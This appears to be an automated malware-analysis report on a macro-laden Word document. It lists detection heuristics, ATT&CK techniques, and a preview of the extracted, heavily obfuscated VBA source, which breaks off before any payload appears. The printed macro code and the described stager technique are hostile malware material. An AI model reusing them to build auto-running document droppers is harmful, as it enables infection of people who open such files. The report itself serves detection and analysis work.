Verdict: MALICIOUS
Risk Score: 302

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment

Malware Insights
The sample contains VBA macros, including a Document_Open macro and a UserForm hidden-property command stager, which are indicative of malicious intent. The presence of these elements suggests the document is designed to execute arbitrary code, likely to download and run a second-stage payload. The ClamAV detection further supports its malicious classification.
Heuristics (8)
- ClamAV: Doc.Trojan.Agent-7431341-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Agent-7431341-0
- VBA macros detected (medium, OLE_VBA_MACROS, 5 related findings): Document contains VBA macro code
- VBA UserForm hidden-property command stager (critical, OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER): VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: 2272c1115285e749c4d0b248c742636e0744e0ab9b3ec020ae81294671298877) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13345 bytes |
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Ozshzqjd"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Ufstywhugmwo, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Kwgyoxrq = "Camille"
Dim Lvjyxvxub As Boolean
Dim Sbytdjqvzbesy As Double
Gocbnwkgl = ("Molestias.")
Dim Ygodncohrvif As Double
Dim Bvcdhclwroi As Double
Dim Kaiunill As Integer
Voberkkyj = Mbhcdihcoav
Dim Egjbuwzb As Boolean
Hpfxtlhqyzm = ("Itaque nesciunt itaque veritatis necessitatibus voluptatibus mollitia sit impedit similique.")
Dim Arjadjwgzszak As String
Dim Dntlvmanyk As String
Dim Gkxwpghiklv As String
Uihwfwjjymkg = "Dolores id atque."
Dim Madlqpsp As Double
Dim Wjuctzsr As Integer
Dim Bdtqsndhixmp As Boolean
Uhgafgzfm = ("Candice")
Dim Wchqzttjhaihn As Integer
Llgyqhup = 668
Ssmqtwroqw = Rjetghdlashcu
Nosbmzegbhsne = 729
Aqymlywilg
Stwmosksgoxkq = "Ea."
Dim Gdfguodpcr As Boolean
Dim Xkejttxzo As Integer
Xtjtupgoi = ("Quia hic assumenda debitis id deserunt.")
Dim Qgdynipdtuplm As Integer
Dim Edqtoyhy As Boolean
Dim Kujzwdqdztx As Double
Gokkejhhwlrk = Pnaihukcngdxq
Dim Nofyijeen As Integer
Afoirptgaqz = ("Sed incidunt molestias incidunt impedit ab commodi veniam rem eum.")
Dim Lkeadhgtizi As Boolean
Dim Ltnkjmftuf As String
Dim Ooekyrndp As Double
Fdagwvrgfmfdz = "Accusamus asperiores et et perspiciatis possimus est perferendis cupiditate."
Dim Gmfwrfrvpsc As Integer
Dim Hutwyvigjg As Double
Dim Cyhsikeqilbyt As Integer
Oiknulhyltjf = ("Et optio.")
Dim Iwgwypgjch As Integer
Sbwtuccbuyyso = 487
Awzzfafapubu = Efdfwtgcryg
Rkxoimuf = 107
End Sub
Attribute VB_Name = "Sqqlhtxfpmdb"
Attribute VB_Base = "0{C2E295E7-ED9E-44C9-BBBA-EF1412C18D8E}{94624045-EFE1-4E8D-9772-72355EA0E52F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Pbxqeoszuxx"
Function Reycbswedx()
Otgsfmxppv = "Et vitae saepe eos illum excepturi non."
Dim Iwmmfhfv As String
Dim Lziuheiknsarn As Integer
Fbmhdpzeoe = ("Id maxime ea itaque.")
Dim Drdzlvrihjk As Integer
Dim Hfhgcqidbzfs As Boolean
Dim Hlvuqqreskt As Boolean
Wadvqhovjsxmo = Brxhxhkxlp
Dim Bdmxnntmdye As String
Arxtxicihd = ("Aut est.")
Dim Mroldrgwtm As Double
Dim Ukyuvgdmiwxqm As String
Dim Gsfualkbwea As String
Ysrnybynk = "Sarah"
Dim Azpeptyzzdz As Double
Dim Sslkjbpvfxn As String
Dim Jrlfawkst As Double
Glcgabczocvg = ("Neque.")
Dim Eirsvbbojjg As Boolean
Ddtvyrpexyju = 833
Obcolvrwnszy = Rbszmhzvugwo
Gjiyqgmnhv = 746
Fzpfdckgdauvb = Ozshzqjd.Ufstywhugmwo
Lohnyjtfuj = "Ignacio"
Dim Cqetookvsbbh As Boolean
Dim Aiwgklmfidub As String
Oauiatluqhcv = ("Ipsum asperiores ut dignissimos explicabo voluptate.")
Dim Tknzggil As String
Dim Yrgxiaznetg As String
Dim Shmggsoep As Boolean
Lyquvdjds = Jmnmqipqax
Dim Urtzbttj As Integer
Yljjesbjdybiy = ("Porro.")
Dim Ubgpzqljuvcb As String
Dim Kzwajoccg As Boolean
Dim Ortdcmttggrmu As String
Nbonbqxbtz = "Impedit totam accusamus voluptatem."
Dim Olqsvdskz As Double
Dim Sjjhxbtmc As Integer
Dim Bansbgrp As Boolean
Xdfipovj = ("Vel.")
Dim Jvuwdsja As Integer
Ncrmkqfc = 624
Sjrdvfdyhn = Aqrffroi
Papvlsyzjth = 275
Bwfpnhywpikk = Fzpfdckgdauvb + Sqqlhtxfpmdb.Mqgcunaedy + Sqqlhtxfpmdb.Nierknvlxv + Sqqlhtxfpmdb.Igerfiahvc
Nfsiyiidko = "Aperiam aut qui dolor."
Dim Mobntxqbrts As Boolean
Dim Imxbptvvtresa As String
Jotnkjkmb = ("Doloribus molestias porro.")
Dim Vresunylpvlcv As String
Dim Stxwutwksca As Boolean
Dim Nyavkrxdrb As String
Uolkymxstqr = Weyhmqtio
Dim Upsexmbsafae As Double
Uqdmqxhmqomzw = ("Sequi consequatur.")
Dim Difqtqiusv As Double
Dim Zoawznhsaqw As Integer
Dim Kiydsyqw As Boolean
Wuorjlvkqjhhx = "Lana"
Dim Mlomkmlhpjhj As Boolean
Dim Xqtrqdbl As Double
Dim Gegfotckilfmb A
... (truncated)